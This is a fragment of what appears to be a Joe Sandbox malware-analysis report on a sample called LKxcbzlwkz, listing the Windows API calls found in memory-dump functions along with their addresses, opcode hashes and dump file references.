• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                                                                                                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1871949834-0
                                                                                                                                                                                                                                                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                                                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3611059338-0
                                                                                                                                                                                                                                                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                                                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                                                                                                                            APIs
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
• Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
• Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
• Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
• Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• _wcslen.LIBCMT ref: 004438CD
• _wcslen.LIBCMT ref: 004438E6
• _wcstok.LIBCMT ref: 004438F8
• _wcslen.LIBCMT ref: 0044390C
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
• _wcstok.LIBCMT ref: 00443931
Similarity
• API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
• String ID:
• API String ID: 3632110297-0
• Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
• Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
• Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
• Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
Similarity
• API ID: Destroy$DeleteMenuObject$IconWindow
• String ID:
• API String ID: 752480666-0
• Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
• Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
• Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
• Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
• Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
• Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
• Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
• Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                                                                                                                                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 004555C7
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3691411573-0
                                                                                                                                                                                                                                                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                                                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                                                                                                                                            • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                                                                                                                                            • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                                                                                                                                            • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 372113273-0
                                                                                                                                                                                                                                                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                                                                                                                                            APIs
• GetDC.USER32(00000000), ref: 0044CC6D
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
APIs
• __getptd.LIBCMT ref: 0041708E
  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
• __amsg_exit.LIBCMT ref: 004170AE
• __lock.LIBCMT ref: 004170BE
• InterlockedDecrement.KERNEL32(?), ref: 004170DB
• _free.LIBCMT ref: 004170EE
• InterlockedIncrement.KERNEL32(017D2CE0), ref: 00417106
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
• String ID:
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 0044B655
• EnterCriticalSection.KERNEL32(?), ref: 0044B666
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
• LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Virtual
• String ID:
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                            • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 442100245-0
                                                                                                                                                                                                                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
